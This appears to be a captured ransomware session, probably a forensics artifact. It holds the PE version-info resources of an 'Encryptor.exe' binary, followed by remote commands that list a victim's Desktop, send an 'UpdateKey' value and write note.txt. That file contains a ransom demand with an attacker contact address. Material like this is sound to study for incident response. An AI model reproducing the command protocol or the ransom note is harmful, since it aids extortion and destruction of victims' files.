\x00\x00\x80\x18\x00\x00\x00P\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x008\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\xac\x03\x00\x00\x90@\x00\x00\x1c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x034\x00\x00\x00V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00\x00\x00\xbd\x04\xef\xfe\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x00\x00\x00\x01\x00V\x00a\x00r\x00F\x00i\x00l\x00e\x00I\x00n\x00f\x00o\x00\x00\x00\x00\x00$\x00\x04\x00\x00\x00T\x00r\x00a\x00n\x00s\x00l\x00a\x00t\x00i\x00o\x00n\x00\x00\x00\x00\x00\x00\x00\xb0\x04|\x02\x00\x00\x01\x00S\x00t\x00r\x00i\x00n\x00g\x00F\x00i\x00l\x00e\x00I\x00n\x00f\x00o\x00\x00\x00X\x02\x00\x00\x01\x000\x000\x000\x000\x000\x004\x00b\x000\x00\x00\x00\x1a\x00\x01\x00\x01\x00C\x00o\x00m\x00m\x00e\x00n\x00t\x00s\x00\x00\x00\x00\x00\x00\x00"\x00\x01\x00\x01\x00C\x00o\x00m\x00p\x00a\x00n\x00y\x00N\x00a\x00m\x00e\x00\x00\x00\x00\x00\x00\x00\x00\x00<\x00\n\x00\x01\x00F\x00i\x00l\x00e\x00D\x00e\x00s\x00c\x00r\x00i\x00p\x00t\x00i\x00o\x00n\x00\x00\x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00o\x00r\x00\x00\x000\x00\x08\x00\x01\x00F\x00i\x00l\x00e\x00V\x00e\x00r\x00s\x00i\x00o\x00n\x00\x00\x00\x00\x001\x00.\x000\x00.\x000\x00.\x000\x00\x00\x00<\x00\x0e\x00\x01\x00I\x00n\x00t\x00e\x00r\x00n\x00a\x00l\x00N\x00a\x00m\x00e\x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00o\x00r\x00.\x00e\x00x\x00e\x00\x00\x00H\x00\x12\x00\x01\x00L\x00e\x00g\x00a\x00l\x00C\x00o\x00p\x00y\x00r\x00i\x00g\x00h\x00t\x00\x00\x00C\x00o\x00p\x00y\x00r\x00i\x00g\x00h\x00t\x00 \x00\xa9\x00 \x00 \x002\x000\x002\x001\x00\x00\x00*\x00\x01\x00\x01\x00L\x00e\x00g\x00a\x00l\x00T\x00r\x00a\x00d\x00e\x00m\x00a\x00r\x00k\x00s\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x00\x0e\x00\x01\x00O\x00r\x00i\x00g\x00i\x00n\x00a\x00l\x00F\x00i\x00l\x00e\x00n\x00a\x00m\x00e\x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00o\x00r\x00.\x00e\x00x\x00e\x00\x00\x004\x00\n\x00\x01\x00P\x00r\x00o\x00d\x00u\x00c\x00t\x00N\x00a\x00m\x00e\x00\x00\x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00o\x00r\x00\x00\x004\x00\x08\x00\x01\x00P\x00r\x00o\x00d\x00u\x00c\x00t\x00V\x00e\x00r\x00s\x00i\x00o\x00n\x00\x00\x001\x00.\x000\x00.\x000\x00.\x000\x00\x00\x008\x00\x08\x00\x01\x00A\x00s\x00s\x00e\x00m\x00b\x00l\x00y\x00 \x00V\x00e\x00r\x00s\x00i\x00o\x00n\x00\x00\x001\x00.\x000\x00.\x000\x00.\x000\x00\x00\x00\xbcC\x00\x00\xea\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\xbb\xbf<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n\r\n<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">\r\n  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>\r\n  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">\r\n    <security>\r\n      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">\r\n        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x0c\x00\x00\x00\x885\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
ok
rc
dir C:\Users\RAshley\Desktop
 Volume in drive C has no label.
 Volume Serial Number is 363A-11A5

 Directory of C:\Users\RAshley\Desktop

07/06/2021  04:34 PM    <DIR>          .
07/06/2021  04:34 PM    <DIR>          ..
07/06/2021  04:34 PM            33,749 your_documents
               1 File(s)         33,749 bytes
               2 Dir(s)  45,390,848,000 bytes free

rr
UpdateKey
d31dd518-8614-4162-beae-7a5a2ad86cc6
wf
C:\Users\RAshley\Desktop\note.txt
All your files have been encrypted. Contact me at gh0st@l33th4cks.co to obtain information on how to unlock them.

ok
